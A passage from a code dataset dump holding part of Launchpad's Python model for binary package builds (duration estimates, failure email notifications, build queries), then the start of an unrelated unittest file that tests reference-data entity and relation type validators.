architecturespecific, shlibdeps=None, depends=None, recommends=None,\n suggests=None, conflicts=None, replaces=None, provides=None,\n pre_depends=None, enhances=None, breaks=None, essential=False,\n debug_package=None, user_defined_fields=None, homepage=None):\n \"\"\"See IBuild.\"\"\"\n return BinaryPackageRelease(\n build=self, binarypackagename=binarypackagename, version=version,\n summary=summary, description=description,\n binpackageformat=binpackageformat,\n component=component, section=section, priority=priority,\n shlibdeps=shlibdeps, depends=depends, recommends=recommends,\n suggests=suggests, conflicts=conflicts, replaces=replaces,\n provides=provides, pre_depends=pre_depends, enhances=enhances,\n breaks=breaks, essential=essential, installedsize=installedsize,\n architecturespecific=architecturespecific,\n debug_package=debug_package,\n user_defined_fields=user_defined_fields, homepage=homepage)\n\n def estimateDuration(self):\n \"\"\"See `IPackageBuild`.\"\"\"\n # Always include the primary archive when looking for\n # past build times (just in case that none can be found\n # in a PPA or copy archive).\n archives = [self.archive.id]\n if self.archive.purpose != ArchivePurpose.PRIMARY:\n archives.append(self.distro_arch_series.main_archive.id)\n\n # Look for all sourcepackagerelease instances that match the name\n # and get the (successfully built) build records for this\n # package.\n completed_builds = Store.of(self).find(\n BinaryPackageBuild,\n BinaryPackageBuild.archive_id.is_in(archives),\n BinaryPackageBuild.distro_arch_series == self.distro_arch_series,\n BinaryPackageBuild.source_package_name == self.source_package_name,\n BinaryPackageBuild.date_finished != None,\n BinaryPackageBuild.status == BuildStatus.FULLYBUILT,\n BinaryPackageBuild.id != self.id)\n most_recent_build = completed_builds.order_by(\n Desc(BinaryPackageBuild.date_finished),\n Desc(BinaryPackageBuild.id)).first()\n if most_recent_build is not None and most_recent_build.duration:\n # Historic build data exists, use the most recent value -\n # assuming it has valid data.\n return most_recent_build.duration\n\n # Estimate the build duration based on package size if no\n # historic build data exists.\n # Get the package size in KB.\n package_size = self.source_package_release.getPackageSize()\n if package_size > 0:\n # Analysis of previous build data shows that a build rate\n # of 6 KB/second is realistic. Furthermore we have to add\n # another minute for generic build overhead.\n estimate = int(package_size / 6.0 / 60 + 1)\n else:\n # No historic build times and no package size available,\n # assume a build time of 5 minutes.\n estimate = 5\n return datetime.timedelta(minutes=estimate)\n\n def verifySuccessfulUpload(self):\n return bool(self.binarypackages)\n\n def notify(self, extra_info=None):\n \"\"\"See `IPackageBuild`.\n\n If config.buildmaster.build_notification is disable, simply\n return.\n\n If config.builddmaster.notify_owner is enabled and SPR.creator\n has preferredemail it will send an email to the creator, Bcc:\n to the config.builddmaster.default_recipient. If one of the\n conditions was not satisfied, no preferredemail found (autosync\n or untouched packages from debian) or config options disabled,\n it will only send email to the specified default recipient.\n\n This notification will contain useful information about\n the record in question (all states are supported), see\n doc/build-notification.txt for further information.\n \"\"\"\n\n if not config.builddmaster.send_build_notification:\n return\n if self.status == BuildStatus.FULLYBUILT:\n return\n\n recipients = set()\n\n fromaddress = format_address(\n config.builddmaster.default_sender_name,\n config.builddmaster.default_sender_address)\n\n extra_headers = {\n 'X-Launchpad-Build-State': self.status.name,\n 'X-Launchpad-Build-Component': self.current_component.name,\n 'X-Launchpad-Build-Arch':\n self.distro_arch_series.architecturetag,\n }\n\n # XXX cprov 2006-10-27: Temporary extra debug info about the\n # SPR.creator in context, to be used during the service quarantine,\n # notify_owner will be disabled to avoid *spamming* Debian people.\n creator = self.source_package_release.creator\n extra_headers['X-Creator-Recipient'] = \",\".join(\n get_contact_email_addresses(creator))\n\n # Currently there are 7038 SPR published in edgy which the creators\n # have no preferredemail. They are the autosync ones (creator = katie,\n # 3583 packages) and the untouched sources since we have migrated from\n # DAK (the rest). We should not spam Debian maintainers.\n\n # Please note that both the package creator and the package uploader\n # will be notified of failures if:\n # * the 'notify_owner' flag is set\n # * the package build (failure) occurred in the original\n # archive.\n package_was_not_copied = (\n self.archive == self.source_package_release.upload_archive)\n\n if package_was_not_copied and config.builddmaster.notify_owner:\n if (self.archive.is_ppa and creator.inTeam(self.archive.owner)\n or\n not self.archive.is_ppa):\n # If this is a PPA, the package creator should only be\n # notified if they are the PPA owner or in the PPA team.\n # (see bug 375757)\n # Non-PPA notifications inform the creator regardless.\n recipients = recipients.union(\n get_contact_email_addresses(creator))\n dsc_key = self.source_package_release.dscsigningkey\n if dsc_key:\n recipients = recipients.union(\n get_contact_email_addresses(dsc_key.owner))\n\n # Modify notification contents according to the targeted archive.\n # 'Archive Tag', 'Subject' and 'Source URL' are customized for PPA.\n # We only send build-notifications to 'buildd-admin' celebrity for\n # main archive candidates.\n # For PPA build notifications we include the archive.owner\n # contact_address.\n if not self.archive.is_ppa:\n buildd_admins = getUtility(ILaunchpadCelebrities).buildd_admin\n recipients = recipients.union(\n get_contact_email_addresses(buildd_admins))\n archive_tag = '%s primary archive' % self.distribution.name\n subject = \"[Build #%d] %s\" % (self.id, self.title)\n source_url = canonical_url(self.distributionsourcepackagerelease)\n else:\n recipients = recipients.union(\n get_contact_email_addresses(self.archive.owner))\n # For PPAs we run the risk of having no available contact_address,\n # for instance, when both, SPR.creator and Archive.owner have\n # not enabled it.\n if len(recipients) == 0:\n return\n archive_tag = '%s PPA' % get_ppa_reference(self.archive)\n subject = \"[Build #%d] %s (%s)\" % (\n self.id, self.title, archive_tag)\n source_url = 'not available'\n extra_headers['X-Launchpad-PPA'] = get_ppa_reference(self.archive)\n\n # XXX cprov 2006-08-02: pending security recipients for SECURITY\n # pocket build. We don't build SECURITY yet :(\n\n # XXX cprov 2006-08-02: find out a way to glue parameters reported\n # with the state in the build worflow, maybe by having an\n # IBuild.statusReport property, which could also be used in the\n # respective page template.\n if self.status in [\n BuildStatus.NEEDSBUILD, BuildStatus.SUPERSEDED]:\n # untouched builds\n buildduration = 'not available'\n buildlog_url = 'not available'\n builder_url = 'not available'\n elif self.status == BuildStatus.UPLOADING:\n buildduration = 'uploading'\n buildlog_url = 'see builder page'\n builder_url = 'not available'\n elif self.status == BuildStatus.BUILDING:\n # build in process\n buildduration = 'not finished'\n buildlog_url = 'see builder page'\n builder_url = canonical_url(self.buildqueue_record.builder)\n else:\n # completed states (success and failure)\n buildduration = DurationFormatterAPI(\n self.duration).approximateduration()\n buildlog_url = self.log_url\n builder_url = canonical_url(self.builder)\n\n if self.status == BuildStatus.FAILEDTOUPLOAD:\n assert extra_info is not None, (\n 'Extra information is required for FAILEDTOUPLOAD '\n 'notifications.')\n extra_info = 'Upload log:\\n%s' % extra_info\n else:\n extra_info = ''\n\n template = get_email_template('build-notification.txt', app='soyuz')\n replacements = {\n 'source_name': self.source_package_release.name,\n 'source_version': self.source_package_release.version,\n 'architecturetag': self.distro_arch_series.architecturetag,\n 'build_state': self.status.title,\n 'build_duration': buildduration,\n 'buildlog_url': buildlog_url,\n 'builder_url': builder_url,\n 'build_title': self.title,\n 'build_url': canonical_url(self),\n 'source_url': source_url,\n 'extra_info': extra_info,\n 'archive_tag': archive_tag,\n 'component_tag': self.current_component.name,\n }\n message = template % replacements\n\n for toaddress in recipients:\n simple_sendmail(\n fromaddress, toaddress, subject, message,\n headers=extra_headers)\n\n def _getDebByFileName(self, filename):\n \"\"\"Helper function to get a .deb LFA in the context of this build.\"\"\"\n bpf = self.getBinaryPackageFileByName(filename)\n if bpf is not None:\n return bpf.libraryfile\n else:\n return None\n\n def getFileByName(self, filename):\n \"\"\"See `IBuild`.\"\"\"\n if filename.endswith('.changes'):\n file_object = self.upload_changesfile\n elif filename.endswith('.txt.gz'):\n file_object = self.log\n elif filename.endswith('_log.txt'):\n file_object = self.upload_log\n elif filename.endswith('deb'):\n file_object = self._getDebByFileName(filename)\n else:\n raise NotFoundError(filename)\n\n if file_object is not None and file_object.filename == filename:\n return file_object\n\n raise NotFoundError(filename)\n\n def getBinaryPackageFileByName(self, filename):\n \"\"\"See `IBuild`.\"\"\"\n return Store.of(self).find(\n BinaryPackageFile,\n BinaryPackageRelease.build == self.id,\n BinaryPackageFile.binarypackagerelease == BinaryPackageRelease.id,\n LibraryFileAlias.id == BinaryPackageFile.libraryfileID,\n LibraryFileAlias.filename == filename).one()\n\n def getUploader(self, changes):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n return changes.signer\n\n\nclass BinaryPackageBuildSet:\n implements(IBinaryPackageBuildSet)\n\n def new(self, distro_arch_series, source_package_release, processor,\n archive, pocket, status=BuildStatus.NEEDSBUILD,\n date_created=None, builder=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Create the BuildFarmJob for the new BinaryPackageBuild.\n build_farm_job = getUtility(IBuildFarmJobSource).new(\n BinaryPackageBuild.job_type, status, date_created, builder,\n archive)\n binary_package_build = BinaryPackageBuild(\n build_farm_job=build_farm_job,\n distro_arch_series=distro_arch_series,\n source_package_release=source_package_release,\n archive=archive, pocket=pocket, status=status, processor=processor,\n virtualized=archive.require_virtualized, builder=builder,\n is_distro_archive=archive.is_main,\n distribution=distro_arch_series.distroseries.distribution,\n distro_series=distro_arch_series.distroseries,\n source_package_name=source_package_release.sourcepackagename)\n if date_created is not None:\n binary_package_build.date_created = date_created\n return binary_package_build\n\n def getByID(self, id):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n try:\n return BinaryPackageBuild.get(id)\n except SQLObjectNotFound as e:\n raise NotFoundError(str(e))\n\n def getByBuildFarmJob(self, build_farm_job):\n \"\"\"See `ISpecificBuildFarmJobSource`.\"\"\"\n return Store.of(build_farm_job).find(\n BinaryPackageBuild, build_farm_job_id=build_farm_job.id).one()\n\n def preloadBuildsData(self, builds):\n # Circular imports.\n from lp.soyuz.model.distroarchseries import DistroArchSeries\n from lp.registry.model.distroseries import DistroSeries\n from lp.registry.model.distribution import Distribution\n from lp.soyuz.model.archive import Archive\n from lp.registry.model.person import Person\n self._prefetchBuildData(builds)\n das = load_related(DistroArchSeries, builds, ['distro_arch_series_id'])\n archives = load_related(Archive, builds, ['archive_id'])\n load_related(Person, archives, ['ownerID'])\n distroseries = load_related(DistroSeries, das, ['distroseriesID'])\n load_related(Distribution, distroseries, ['distributionID'])\n\n def getByBuildFarmJobs(self, build_farm_jobs):\n \"\"\"See `ISpecificBuildFarmJobSource`.\"\"\"\n if len(build_farm_jobs) == 0:\n return EmptyResultSet()\n rows = Store.of(build_farm_jobs[0]).find(\n BinaryPackageBuild,\n BinaryPackageBuild.build_farm_job_id.is_in(\n bfj.id for bfj in build_farm_jobs))\n return DecoratedResultSet(rows, pre_iter_hook=self.preloadBuildsData)\n\n def handleOptionalParamsForBuildQueries(\n self, clauses, origin, status=None, name=None, pocket=None,\n arch_tag=None):\n \"\"\"Construct query clauses needed/shared by all getBuild..() methods.\n\n This method is not exposed via the public interface as it is only\n used to DRY-up trusted code.\n\n :param clauses: container to which to add any resulting query clauses.\n :param origin: container to which to add joined tables.\n :param status: optional build state for which to add a query clause if\n present.\n :param name: optional source package release name (or list of source\n package release names) for which to add a query clause if\n present.\n :param pocket: optional pocket (or list of pockets) for which to add a\n query clause if present.\n :param arch_tag: optional architecture tag for which to add a\n query clause if present.\n \"\"\"\n # Circular. :(\n from lp.soyuz.model.distroarchseries import DistroArchSeries\n\n origin.append(BinaryPackageBuild)\n\n # Add query clause that filters on build state if the latter is\n # provided.\n if status is not None:\n clauses.append(BinaryPackageBuild.status == status)\n\n # Add query clause that filters on pocket if the latter is provided.\n if pocket:\n if not isinstance(pocket, (list, tuple)):\n pocket = (pocket,)\n clauses.append(BinaryPackageBuild.pocket.is_in(pocket))\n\n # Add query clause that filters on architecture tag if provided.\n if arch_tag is not None:\n clauses.append(\n BinaryPackageBuild.distro_arch_series_id ==\n DistroArchSeries.id)\n if not isinstance(arch_tag, (list, tuple)):\n arch_tag = (arch_tag,)\n clauses.append(DistroArchSeries.architecturetag.is_in(arch_tag))\n origin.append(DistroArchSeries)\n\n # Add query clause that filters on source package release name if the\n # latter is provided.\n if name is not None:\n clauses.append(\n BinaryPackageBuild.source_package_name_id ==\n SourcePackageName.id)\n origin.extend([SourcePackageName])\n if not isinstance(name, (list, tuple)):\n clauses.append(\n SourcePackageName.name.contains_string(name))\n else:\n clauses.append(SourcePackageName.name.is_in(name))\n\n def getBuildsForBuilder(self, builder_id, status=None, name=None,\n arch_tag=None, user=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Circular. :(\n from lp.soyuz.model.archive import (\n Archive, get_archive_privacy_filter)\n\n clauses = [\n BinaryPackageBuild.archive_id == Archive.id,\n BinaryPackageBuild.builder_id == builder_id,\n get_archive_privacy_filter(user)]\n origin = [Archive]\n\n self.handleOptionalParamsForBuildQueries(\n clauses, origin, status, name, pocket=None, arch_tag=arch_tag)\n\n return IStore(BinaryPackageBuild).using(*origin).find(\n BinaryPackageBuild, *clauses).order_by(\n Desc(BinaryPackageBuild.date_finished),\n BinaryPackageBuild.id)\n\n def getBuildsForArchive(self, archive, status=None, name=None,\n pocket=None, arch_tag=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n clauses = [BinaryPackageBuild.archive_id == archive.id]\n origin = []\n\n self.handleOptionalParamsForBuildQueries(\n clauses, origin, status, name, pocket, arch_tag)\n\n # Ordering according status\n # * SUPERSEDED & All by -datecreated\n # * FULLYBUILT & FAILURES by -datebuilt\n # It should present the builds in a more natural order.\n if status == BuildStatus.SUPERSEDED or status is None:\n orderBy = [Desc(BinaryPackageBuild.date_created)]\n else:\n orderBy = [Desc(BinaryPackageBuild.date_finished)]\n # All orders fallback to id if the primary order doesn't succeed\n orderBy.append(BinaryPackageBuild.id)\n\n return self._decorate_with_prejoins(\n IStore(BinaryPackageBuild).using(*origin).find(\n BinaryPackageBuild, *clauses).order_by(*orderBy))\n\n def getBuildsForDistro(self, context, status=None, name=None,\n pocket=None, arch_tag=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n if IDistribution.providedBy(context):\n col = BinaryPackageBuild.distribution_id\n elif IDistroSeries.providedBy(context):\n col = BinaryPackageBuild.distro_series_id\n elif IDistroArchSeries.providedBy(context):\n col = BinaryPackageBuild.distro_arch_series_id\n else:\n raise AssertionError(\"Unsupported context: %r\" % context)\n condition_clauses = [\n col == context.id, BinaryPackageBuild.is_distro_archive]\n\n # XXX cprov 2006-09-25: It would be nice if we could encapsulate\n # the chunk of code below (which deals with the optional paramenters)\n # and share it with ISourcePackage.getBuildRecords()\n\n # exclude gina-generated and security (dak-made) builds\n # status == FULLYBUILT && datebuilt == null\n if status == BuildStatus.FULLYBUILT:\n condition_clauses.append(BinaryPackageBuild.date_finished != None)\n else:\n condition_clauses.append(Or(\n BinaryPackageBuild.status != BuildStatus.FULLYBUILT,\n BinaryPackageBuild.date_finished != None))\n\n # Ordering according status\n # * NEEDSBUILD, BUILDING & UPLOADING by -lastscore\n # * SUPERSEDED & All by -BinaryPackageBuild.id\n # (nearly equivalent to -datecreated, but much more\n # efficient.)\n # * FULLYBUILT & FAILURES by -datebuilt\n # It should present the builds in a more natural order.\n clauseTables = []\n order_by_table = None\n if status in [\n BuildStatus.NEEDSBUILD,\n BuildStatus.BUILDING,\n BuildStatus.UPLOADING]:\n order_by = [Desc(BuildQueue.lastscore), BinaryPackageBuild.id]\n order_by_table = BuildQueue\n clauseTables.extend([BuildQueue, BuildPackageJob])\n condition_clauses.extend([\n BuildPackageJob.build_id == BinaryPackageBuild.id,\n BuildPackageJob.job_id == BuildQueue.jobID])\n elif status == BuildStatus.SUPERSEDED or status is None:\n order_by = [Desc(BinaryPackageBuild.id)]\n else:\n order_by = [Desc(BinaryPackageBuild.date_finished),\n BinaryPackageBuild.id]\n\n # End of duplication (see XXX cprov 2006-09-25 above).\n\n self.handleOptionalParamsForBuildQueries(\n condition_clauses, clauseTables, status, name, pocket, arch_tag)\n\n find_spec = (BinaryPackageBuild,)\n if order_by_table:\n find_spec = find_spec + (order_by_table,)\n result_set = IStore(BinaryPackageBuild).using(*clauseTables).find(\n find_spec, *condition_clauses)\n result_set.order_by(*order_by)\n\n return self._decorate_with_prejoins(\n DecoratedResultSet(result_set, result_decorator=itemgetter(0)))\n\n def _decorate_with_prejoins(self, result_set):\n \"\"\"Decorate build records with related data prefetch functionality.\"\"\"\n # Grab the native storm result set.\n result_set = IResultSet(result_set)\n decorated_results = DecoratedResultSet(\n result_set, pre_iter_hook=self._prefetchBuildData)\n return decorated_results\n\n def getBuildsBySourcePackageRelease(self, sourcepackagerelease_ids,\n buildstate=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n if (sourcepackagerelease_ids is None or\n len(sourcepackagerelease_ids) == 0):\n return []\n query = [\n BinaryPackageBuild.source_package_release_id.is_in(\n sourcepackagerelease_ids),\n BinaryPackageBuild.is_distro_archive,\n ]\n\n if buildstate is not None:\n query.append(BinaryPackageBuild.status == buildstate)\n\n resultset = IStore(BinaryPackageBuild).find(BinaryPackageBuild, *query)\n resultset.order_by(\n Desc(BinaryPackageBuild.date_created), BinaryPackageBuild.id)\n return resultset\n\n def getStatusSummaryForBuilds(self, builds):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Create a small helper function to collect the builds for a given\n # list of build states:\n def collect_builds(*states):\n wanted = []\n for state in states:\n candidates = [build for build in builds\n if build.status == state]\n wanted.extend(candidates)\n return wanted\n\n failed = collect_builds(BuildStatus.FAILEDTOBUILD,\n BuildStatus.MANUALDEPWAIT,\n BuildStatus.CHROOTWAIT,\n BuildStatus.FAILEDTOUPLOAD)\n needsbuild = collect_builds(BuildStatus.NEEDSBUILD)\n building = collect_builds(BuildStatus.BUILDING,\n BuildStatus.UPLOADING)\n successful = collect_builds(BuildStatus.FULLYBUILT)\n\n # Note: the BuildStatus DBItems are used here to summarize the\n # status of a set of builds:s\n if len(building) != 0:\n return {\n 'status': BuildSetStatus.BUILDING,\n 'builds': building,\n }\n elif len(needsbuild) != 0:\n return {\n 'status': BuildSetStatus.NEEDSBUILD,\n 'builds': needsbuild,\n }\n elif len(failed) != 0:\n return {\n 'status': BuildSetStatus.FAILEDTOBUILD,\n 'builds': failed,\n }\n else:\n return {\n 'status': BuildSetStatus.FULLYBUILT,\n 'builds': successful,\n }\n\n def _prefetchBuildData(self, results):\n \"\"\"Used to pre-populate the cache with build related data.\n\n When dealing with a group of Build records we can't use the\n prejoin facility to also fetch BuildQueue, SourcePackageRelease\n and LibraryFileAlias records in a single query because the\n result set is too large and the queries time out too often.\n\n So this method receives a list of Build instances and fetches the\n corresponding SourcePackageRelease and LibraryFileAlias rows\n (prejoined with the appropriate SourcePackageName and\n LibraryFileContent respectively) as well as builders related to the\n Builds at hand.\n \"\"\"\n from lp.registry.model.sourcepackagename import (\n SourcePackageName)\n from lp.soyuz.model.sourcepackagerelease import (\n SourcePackageRelease)\n\n # Prefetching is not needed if the original result set is empty.\n if len(results) == 0:\n return\n\n build_ids = [build.id for build in results]\n origin = (\n BinaryPackageBuild,\n Join(\n SourcePackageRelease,\n (SourcePackageRelease.id ==\n BinaryPackageBuild.source_package_release_id)),\n Join(\n SourcePackageName,\n SourcePackageName.id\n == SourcePackageRelease.sourcepackagenameID),\n LeftJoin(LibraryFileAlias,\n LibraryFileAlias.id == BinaryPackageBuild.log_id),\n LeftJoin(LibraryFileContent,\n LibraryFileContent.id == LibraryFileAlias.contentID),\n LeftJoin(Builder, Builder.id == BinaryPackageBuild.builder_id),\n )\n result_set = IStore(BinaryPackageBuild).using(*origin).find(\n (SourcePackageRelease, LibraryFileAlias, SourcePackageName,\n LibraryFileContent, Builder),\n BinaryPackageBuild.id.is_in(build_ids))\n\n # Force query execution so that the ancillary data gets fetched\n # and added to StupidCache.\n # We are doing this here because there is no \"real\" caller of\n # this (pre_iter_hook()) method that will iterate over the\n # result set and force the query execution that way.\n return list(result_set)\n\n def getByQueueEntry(self, queue_entry):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n return IStore(BinaryPackageBuild).find(\n BinaryPackageBuild,\n BuildPackageJob.build == BinaryPackageBuild.id,\n BuildPackageJob.job == BuildQueue.jobID,\n BuildQueue.job == queue_entry.job).one()\n\n def getQueueEntriesForBuildIDs(self, build_ids):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n origin = (\n BuildPackageJob,\n Join(BuildQueue, BuildPackageJob.job == BuildQueue.jobID),\n Join(\n BinaryPackageBuild,\n BuildPackageJob.build == BinaryPackageBuild.id),\n LeftJoin(\n Builder,\n BuildQueue.builderID == Builder.id),\n )\n return IStore(BinaryPackageBuild).using(*origin).find(\n (BuildQueue, Builder, BuildPackageJob),\n BinaryPackageBuild.id.is_in(build_ids))\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/soyuz/model/binarypackagebuild.py","file_name":"binarypackagebuild.py","file_ext":"py","file_size_in_byte":48505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34742158589","text":"from __future__ import division\nfrom core.common.utilities.include import *\n\nimport unittest\n\nfrom common.utilities.inversion_of_control import dependencies, Dependency\nfrom common.helpers.common_dependency_helper import register_common_mock_dependencies\n\nfrom core.common.utilities.errors import *\nfrom core.common.utilities.helpers import *\nfrom core.common.business_logic.reference_data import BusinessReferenceData\n\n__author__ = 'vahram'\n\n###################################################################################################\n\nclass BusinessEntityTests(unittest.TestCase):\n\n def setUp(self):\n\n register_common_mock_dependencies()\n\n def tearDown(self):\n\n dependencies.clear()\n\n ##------------------------------------ Private Methods --------------------------------------##\n\n def __refdata_standard_init(self):\n\n self.time_init_refdata = get_current_timestamp()\n\n self.entity_type_map = \\\n {\n \"e1\":\n {\n \"requirements\":\n {\n \"data.s\": \"string\",\n \"data.i\": \"integer\",\n \"data.f\": \"float\",\n \"data.n\": \"number\",\n \"data.b\": \"boolean\",\n \"data.x\": [1, 2, 3, \"xyz\"],\n }\n },\n \"e2\": {}\n }\n\n self.relation_type_map =\\\n {\n \"rel1\":\n [\n {\n \"from\":\n {\n \"entity_type\": \"e1\",\n \"entity_role\": \"role1\",\n \"requirements\": {\"data.x\": [1, 2, 3]}\n },\n \"to\":\n {\n \"entity_type\": \"e2\",\n \"entity_role\": \"role2\",\n \"requirements\": {\"data.x\": [\"xyz\"]}\n },\n \"properties\":\n {\n \"ownership\": False\n }\n },\n {\n \"from\":\n {\n \"entity_type\": \"e1\",\n \"entity_role\": \"role1_other\",\n \"requirements\": {\"data.z\": \"boolean\"}\n },\n \"to\":\n {\n \"entity_type\": \"e2\",\n \"entity_role\": \"role2_other\",\n \"requirements\": {\"data.z\": \"string\"}\n },\n \"properties\":\n {\n \"ownership\": False\n }\n }\n ]\n }\n\n return BusinessReferenceData.standard_init(\n self.entity_type_map,\n self.relation_type_map,\n time_creation = self.time_init_refdata\n )\n\n def __refdata_dict_init(self):\n\n path = os.path.join(os.path.dirname(__file__), \"data\")\n filename = \"test_reference_data.json\"\n with open(os.path.join(path, filename)) as fin:\n\n ref_data_rec = json.load(fin)\n result = BusinessReferenceData.dict_init(ref_data_rec)\n\n return result\n\n ##---------------------------------- Test Initialization ------------------------------------##\n\n def test_standard_init_success(self):\n\n refdata = self.__refdata_standard_init()\n\n self.assertIsInstance(refdata, BusinessReferenceData)\n self.assertIsInstance(refdata.meta, dict)\n\n self.assertEqual(refdata.meta[\"updated_at\"], self.time_init_refdata)\n self.assertEqual(refdata.meta[\"created_at\"], self.time_init_refdata)\n\n self.assertIsInstance(refdata.entity_type_map, dict)\n self.assertIsInstance(refdata.relation_type_map, dict)\n\n self.assertEqual(len(refdata.entity_type_map), 2)\n self.assertEqual(len(refdata.relation_type_map), 1)\n\n self.assertTrue(refdata.validate())\n\n def test_dict_init_success(self):\n\n refdata = self.__refdata_dict_init()\n\n self.assertIsInstance(refdata, BusinessReferenceData)\n self.assertIsInstance(refdata.meta, dict)\n\n self.assertLessEqual(refdata.meta[\"created_at\"], refdata.meta[\"updated_at\"])\n\n self.assertIsInstance(refdata.entity_type_map, dict)\n self.assertIsInstance(refdata.relation_type_map, dict)\n\n self.assertEqual(len(refdata.entity_type_map), 12)\n self.assertEqual(len(refdata.relation_type_map), 17)\n\n self.assertTrue(refdata.validate())\n\n ##---------------------------------- Test Entity Types - Getters ----------------------------##\n\n def test_entity_type_getters(self):\n\n refdata = self.__refdata_standard_init()\n\n self.assertTrue(refdata.is_valid_entity_type(\"e1\"))\n self.assertTrue(refdata.is_valid_entity_type(\"e2\"))\n self.assertFalse(refdata.is_valid_entity_type(\"e3\"))\n\n self.assertEqual(set(refdata.get_all_entity_types()), {\"e1\", \"e2\"})\n self.assertNotEqual(refdata.get_entity_type_info(\"e1\"), {})\n self.assertEqual(refdata.get_entity_type_info(\"e2\"), {})\n\n validators = refdata.get_entity_type_validators(\"e1\")\n self.assertEqual(set(validators.keys()),\n {\"data.s\", \"data.i\", \"data.f\", \"data.n\", \"data.b\", \"data.x\"})\n self.assertTrue( validators[\"data.s\"](\"x\"))\n self.assertFalse(validators[\"data.s\"](1))\n self.assertTrue( validators[\"data.i\"](1))\n self.assertFalse(validators[\"data.i\"](\"x\"))\n self.assertTrue( validators[\"data.f\"](1.0))\n self.assertFalse(validators[\"data.f\"](1))\n self.assertTrue( validators[\"data.n\"](1.0))\n self.assertTrue( validators[\"data.n\"](1))\n self.assertFalse(validators[\"data.n\"](\"x\"))\n self.assertTrue( validators[\"data.b\"](False))\n self.assertFalse(validators[\"data.b\"](1))\n self.assertTrue( validators[\"data.x\"](1))\n self.assertTrue( validators[\"data.x\"](2))\n self.assertTrue( validators[\"data.x\"](3))\n self.assertTrue( validators[\"data.x\"](\"xyz\"))\n self.assertFalse(validators[\"data.x\"](\"xy\"))\n\n ##---------------------------------- Test Entity Types - Setters ----------------------------##\n\n def test_entity_type_setters(self):\n\n refdata = self.__refdata_standard_init()\n\n context_data = {\n \"source\": \"test_reference_data.py\",\n \"user_id\": None\n }\n refdata.register_context(context_data)\n\n self.assertRaises(InputError, lambda s: refdata.add_entity_type(s), \"e2\")\n self.assertFalse(refdata.is_valid_entity_type(\"e3\"))\n refdata.add_entity_type(\"e3\")\n self.assertTrue(refdata.is_valid_entity_type(\"e3\"))\n refdata.del_entity_type(\"e3\")\n self.assertRaises(InputError, lambda s: refdata.del_entity_type(s), \"e3\")\n\n self.assertNotIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n refdata.add_entity_type_required_field(\"e1\", \"data.y\", field_values = [\"Y\"])\n self.assertIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n self.assertTrue(refdata.get_entity_type_validators(\"e1\")[\"data.y\"](\"Y\"))\n self.assertFalse(refdata.get_entity_type_validators(\"e1\")[\"data.y\"](\"X\"))\n refdata.del_entity_type_required_field(\"e1\", \"data.y\")\n self.assertNotIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n\n #pprint.pprint(refdata.meta)\n\n ##---------------------------------- Test Relation Types - Getters ----------------------------##\n\n def test_relation_type_getters(self):\n\n refdata = self.__refdata_standard_init()\n\n self.assertTrue(refdata.is_valid_relation_type(\"rel1\"))\n self.assertFalse(refdata.is_valid_relation_type(\"rel2\"))\n\n self.assertEqual(refdata.get_all_relation_types(), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e1\", \"e2\"), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e2\", \"e1\"), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e1\", \"e1\"), [])\n self.assertEqual(len(refdata.get_relation_type_info(\"rel1\")), 2)\n\n recs_all = refdata.get_relation_records(\"e1\", \"e2\")\n def f_remove_relation_type(rec):\n self.assertIn(\"relation_type\", rec)\n self.assertEqual(rec[\"relation_type\"], \"rel1\")\n del rec[\"relation_type\"]\n map(f_remove_relation_type, recs_all)\n\n self.assertEqual(len(recs_all), 2)\n self.assertEqual(recs_all, self.relation_type_map[\"rel1\"])\n\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e3\")), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", relation_types = [\"x\"])), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", entity_role_from = \"x\")), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", entity_role_to = \"x\")), 0)\n\n recs_1 = refdata.get_relation_records(\"e1\", \"e2\", entity_role_from = \"role1\")\n map(f_remove_relation_type, recs_1)\n\n self.assertEqual(len(recs_1), 1)\n self.assertEqual(recs_1[0], self.relation_type_map[\"rel1\"][0])\n\n recs_2 = refdata.get_relation_records(\"e1\", \"e2\", entity_role_to = \"role2_other\")\n map(f_remove_relation_type, recs_2)\n\n self.assertEqual(len(recs_2), 1)\n self.assertEqual(recs_2[0], self.relation_type_map[\"rel1\"][1])\n\n def test_real_refdata_relation_type_getters(self):\n\n refdata = self.__refdata_dict_init()\n\n recs = refdata.get_relation_records(\"file\", \"retail_input_record\")\n #print \"\\n\\n\".join(pprint.pformat(rec) for rec in recs)\n\n recs = refdata.get_relation_records(\"retail_input_record\", \"file\")\n #print \"\\n\\n\".join(pprint.pformat(rec) for rec in recs)\n\n\n def test_relation_records_validation(self):\n\n refdata = self.__refdata_dict_init()\n\n data1 =\\\n {\n \"type\": \"retail_parent\",\n \"test1\": \"random stuff\"\n }\n data2 =\\\n {\n \"type\": \"retail_banner\",\n \"test2\": \"random stuff\"\n }\n data3 =\\\n {\n \"type\": \"retail_concept\",\n }\n data4 =\\\n {\n \"name\": \"Banana Republic\",\n }\n\n rel_recs = refdata.get_relation_records(\"company\",\n \"company\",\n \"retailer_branding\",\n \"retail_parent\",\n \"retail_segment\")\n self.assertEqual(len(rel_recs), 2)\n\n validators = refdata.get_relation_record_validators(rel_recs[0])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n 